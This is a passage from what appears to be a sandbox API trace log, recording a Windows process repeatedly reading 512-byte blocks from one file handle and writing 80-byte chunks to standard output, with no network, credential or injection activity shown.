hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.933] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.933] GetFileType (hFile=0x4c) returned 0x1 [0140.933] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.933] GetFileType (hFile=0x4c) returned 0x1 [0140.934] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.934] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) 
returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.935] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, 
lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.937] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.938] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.939] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.940] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 
0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.941] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) 
returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.942] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 